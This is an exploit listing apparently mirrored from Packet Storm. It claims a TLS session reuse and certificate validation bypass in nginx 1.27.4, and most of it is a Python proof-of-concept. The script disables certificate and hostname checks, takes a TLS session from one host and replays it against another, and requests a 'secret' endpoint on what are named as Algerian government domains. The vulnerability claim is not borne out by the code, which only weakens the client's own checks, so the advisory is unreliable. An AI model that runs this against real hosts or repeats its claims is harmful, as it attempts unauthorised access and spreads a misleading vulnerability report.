## https://sploitus.com/exploit?id=PACKETSTORM:223526
==================================================================================================================================
| # Title : nginx 1.27.4 Insecure TLS Session Reuse and SSL Certificate Validation Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://nginx.org/ |
==================================================================================================================================
[+] Summary : the script reuses a TLS/SSL session obtained from one server when connecting to a different server, with certificate and hostname verification completely disabled.
The script establishes encrypted connections, captures a TLS session object, attempts session resumption on another host, and requests a protected API endpoint.
[+] PoC :
#!/usr/bin/env python3
import ssl
import socket
def create_insecure_context():
    """Return a client ``SSLContext`` with certificate and hostname checks turned off.

    The context starts from :func:`ssl.create_default_context` (protocol and
    cipher defaults are left as-is), then ``check_hostname`` is cleared and
    ``verify_mode`` is set to ``ssl.CERT_NONE``.  A socket wrapped with it
    accepts any certificate, including one issued for another host or by an
    untrusted issuer, so the peer's identity is never established.
    """
    ctx = ssl.create_default_context()
    # check_hostname has to be cleared first: ssl refuses to lower verify_mode
    # to CERT_NONE while hostname checking is still enabled.
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx
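source_server = "target01.gov.dz"
target_server = "target02.dz"
print(f" Starting attack from {source_server} to {target_server}")
print("Preparing connection (without certificate verification)...")
# One context is shared by both connections: ssl only lets a session be
# resumed on a socket created from the same SSLContext that produced it.
ssl_context1 = create_insecure_context()
print(f" Connecting to {source_server}...")
# `with` closes both the TCP socket and the TLS wrapper even when connect()
# or the handshake raises; the original closed them only on the happy path.
with socket.create_connection((source_server, 443)) as conn1:
    with ssl_context1.wrap_socket(conn1, server_hostname=source_server) as secure_conn1:
        print(" Stealing session...")
        # NOTE(review): with TLS 1.3 the session ticket is delivered *after*
        # the handshake, so .session may still be None here because no
        # application data has been read -- confirm against the servers used.
        stolen_session = secure_conn1.session
print(f"Session obtained: {stolen_session}")
if stolen_session is None:
    print("No session was issued, so there is nothing to resume on the next connection.")
print(f"\n Attempting to enter {target_server} using the stolen session...")
with socket.create_connection((target_server, 443)) as conn2:
    with ssl_context1.wrap_socket(
        conn2, server_hostname=target_server, session=stolen_session
    ) as secure_conn2:
        # A server that cannot decrypt the offered ticket does not fail; it
        # silently performs a full handshake, so a later "200 OK" proves
        # nothing about the session.  session_reused is the only signal that
        # resumption actually took place.
        session_reused = secure_conn2.session_reused
        print(f"Session resumed by {target_server}: {session_reused}")
        print("Requesting secret configuration file...")
        # 'LINK API' is the author's placeholder; an HTTP request-target has
        # to be a path (starting with "/"), and the surrounding quotes make
        # this request line malformed until it is replaced.
        request = f"GET 'LINK API' HTTP/1.1\r\nHost: {target_server}\r\nConnection: close\r\n\r\n"
        secure_conn2.sendall(request.encode())  # send() may deliver only part of the buffer
        # Connection: close makes the server end the stream after its
        # response, so read until EOF (bounded) instead of trusting a single
        # 8000-byte recv() that may return only the first TLS record.
        chunks = []
        received = 0
        while received < 1_000_000:
            chunk = secure_conn2.recv(8000)
            if not chunk:
                break
            chunks.append(chunk)
            received += len(chunk)
        response = b"".join(chunks)
status_line = response.split(b"\r\n", 1)[0]
# Success requires both a resumed session and a 200 status line; matching
# b"200 OK" anywhere in the response (including the body) was a false
# positive waiting to happen, and a 200 on a fresh handshake is not reuse.
if session_reused and b"200 OK" in status_line:
    print("\nAttack Succeeded! Entered the secret system!")
    print("\n" + "=" * 50)
    print("Leaked Data:")
    print("=" * 50)
    if b"\r\n\r\n" in response:
        body = response.split(b"\r\n\r\n", 1)[1]
        # errors="ignore" cannot raise UnicodeDecodeError, so the bare
        # except/fallback the original wrapped around this line was dead code.
        print(body.decode("utf-8", errors="ignore")[:1500])
else:
    print("\n Attack Failed")
    if not session_reused:
        print("The session was not resumed; the server negotiated a fresh handshake,")
        print("so whatever it returned was served over an ordinary TLS connection.")
    print(f"Server response: {response[:200]}")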
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================